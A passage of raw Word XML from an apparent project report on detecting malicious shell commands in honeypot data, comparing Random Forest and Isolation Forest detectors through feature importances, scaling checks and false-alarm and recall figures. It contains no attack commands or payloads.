      </w:pPr>
      <w:r>
        <w:t>the project's documented risk (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KNOWN_ISSUES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> P3/P8) is that a model latches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>onto a corpus artefact — length, or the presence of a particular binary — and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reports a spuriously high score. A forest that distributes its splits across the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>whole feature set is not riding one shortcut. The Dataset 2 ordering shifts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sensibly rather than collapsing (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.107, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.101,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.088, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.085), consistent with Chapter 3's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>finding that operational data carries weaker per-feature signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>It needs no feature scaling — verified, not assumed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The pipeline in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>StandardScaler</w:t>
      </w:r>
      <w:r>
        <w:t>, but only so that all model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>pipelines share one preprocessing contract. Refitting the production forest with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the scaler removed changes F1 by 0.0017 (Dataset 1) and 0.0003 (Dataset 2) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ROC-AUC by 0.0001 on both — floating-point noise in sklearn's split search, not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a modelling effect, exactly as expected for a learner whose splits depend only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on rank order. The same test on the Isolation Forest returns scores that are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bit-identical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (maximum absolute difference 0.0), since its random split</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>points are drawn uniformly across each feature's range and a per-feature affine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>transform maps that draw onto itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Class imbalance (1:3 attack:benign) is handled by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_weight="balanced_subsample"</w:t>
      </w:r>
      <w:r>
        <w:t>, which reweights the loss **per bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sample**. This is deliberately a cost-sensitive remedy rather than a resampling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>one: no synthetic shell commands are fabricated, so the model is never trained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on a command no attacker ever typed — the same principle Ben applies with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What Random Forest is actually for here — and what it is not.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It is not the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>headline detector: at F1 0.7963 (Dataset 1) / 0.7531 (Dataset 2) it sits below</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the XGBoost-hybrid (0.8761 / 0.8482) and the CNN. Its value is a different</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>operating profile. On Dataset 1 it produces the **lowest false-alarm rate of any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>supervised model in the project** (FPR 0.0337, against 0.0415 for the hybrid,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0.0555 for the CNN and 0.0717 for plain XGBoost) at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>highest precision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(0.8782), buying that with the lowest recall (0.7283). On Dataset 2 the picture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is more even — FPR 0.0515 against the hybrid's 0.0494, precision 0.8186 against</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.8508 — so the low-false-alarm advantage should be claimed for Dataset 1 and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not generalised. A conservative, high-precision, fully auditable model is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>right complement to a high-recall boosted ensemble, and Chapter 7 shows it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>also the hardest model in the project to misconfigure: its entire 12-cell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hyperparameter grid spans just 0.021 F1 on Dataset 1 and 0.027 on Dataset 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>6.5 Isolation Forest as an unsupervised stage-1 filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest is the only model in the portfolio trained **without attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>labels** — it is fitted on the benign training rows alone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IsolationForestDetector.fit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/models.py</w:t>
      </w:r>
      <w:r>
        <w:t>) and scores a command by how few</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>random axis-aligned partitions are needed to isolate it. Anomalies need fewer,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>because they sit in sparse regions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Liu, F. T., Ting, K. M. &amp; Zhou, Z.-H. (2008), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Isolation Forest</w:t>
      </w:r>
      <w:r>
        <w:t>, ICDM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>2008, pp. 413–422, doi:10.1109/ICDM.2008.17, extended as *Isolation-Based Anomaly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Detection*, ACM TKDD 6(1), art. 3, pp. 1–39 (2012), doi:10.1145/2133360.2133363 —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the isolation principle itself, the linear-time/low-memory argument quoted in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reason 3 below, and the sub-sampling analysis we test against production in §6.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Why carry an unsupervised model at all.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Three reasons, in order of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>importance to this project:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Labelled attacks are the scarce resource.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A supervised detector can only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>recognise tradecraft its labels covered. Our attack corpus is finite and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>partly template-derived, so a model that defines "suspicious" as "unlike</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>normal traffic" rather than "like my 3,050 known attacks" is the only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>component with a mechanism for catching a technique nobody labelled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>It cannot inherit the failure mode the rest of the stack shares.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">central methodological worry recorded across Chapter 2 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KNOWN_ISSUES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus-style memorisation — every supervised model here is trained on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>same attack corpus and can learn its idiom rather than its behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest never reads that corpus. Its errors are therefore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>structurally, not just statistically, decorrelated from the others, which is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>what makes the cascade's first stage informative instead of redundant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>It is cheap enough to sit in front of everything.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Scoring a command is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>essentially constant-time — 300 root-to-leaf traversals of depth ~log ψ — and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>needs no labels and no gradient steps, which is exactly the profile a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>first-pass filter over high-volume command telemetry needs. One caveat we</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>should state rather than inherit: Liu et al.'s linear-time, low-memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">guarantee assumes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>fixed small</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sub-sample, and our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_samples=0.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that asymptotic property up (see §6.6). At this corpus size it does not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>matter — the fit takes ≈2 s — but it would matter at telemetry scale, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>§6.6 sweep shows the escape hatch is cheap if it ever does: reverting to the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>paper's full default (ψ=256, t=100) costs 0.0137 ROC-AUC on Dataset 1 and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.0137 on Dataset 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Its weakness is real and we report it at face value.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Standalone, the shipped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">detector reaches only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 0.2492 / ROC-AUC 0.8120</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 1 and **F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.1431 / ROC-AUC 0.6768** on Dataset 2 — by a wide margin the weakest numbers in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the project. Two separate things cause that, and Chapter 7 separates them:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Threshold placement.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The production wrapper thresholds a min-max-normalised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>score at a fixed 0.5, which lands in an extreme-precision corner (recall 0.146,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>FPR 0.008 on Dataset 1). Re-evaluated at sklearn's own calibrated threshold the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>same forest reaches F1 0.641 (Dataset 1) / 0.462 (Dataset 2). Most of the ugly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>headline is where the threshold sits, not how well the model ranks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Genuine ranking limits.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Even at its best operating point it is far below the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>supervised models, and Dataset 2 is much worse than Dataset 1 (AUC 0.677 vs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.812). This is the honest finding, and it is the expected one: on operational</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cowrie traffic "anomalous" and "malicious" come apart, because unusual-but-benign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>commands are common in real telemetry in a way they are not in a curated corpus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>So it is deployed as stage 1 of the cascade and nowhere else.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ensemble.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the first stage's job is to clear obvious benign traffic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cheaply and pass everything else to the XGBoost-hybrid — a filter, not a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>detector. The metric that matters for that job is not F1 but **attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>retention**, and the two are in direct conflict: Chapter 7 shows that even the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>most permissive swept setting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination=0.30</w:t>
      </w:r>
      <w:r>
        <w:t>) retains only 73% (Dataset 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>/ 56% (Dataset 2) of attacks, and a stage-1 filter that silently discards a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quarter of the attacks caps the entire cascade's recall no matter how strong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">stage 2 is. The production cascade therefore ignores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> altogether</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and calibrates its clearing threshold on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack-score quantile</w:t>
      </w:r>
    </w:p>
    <w:p>
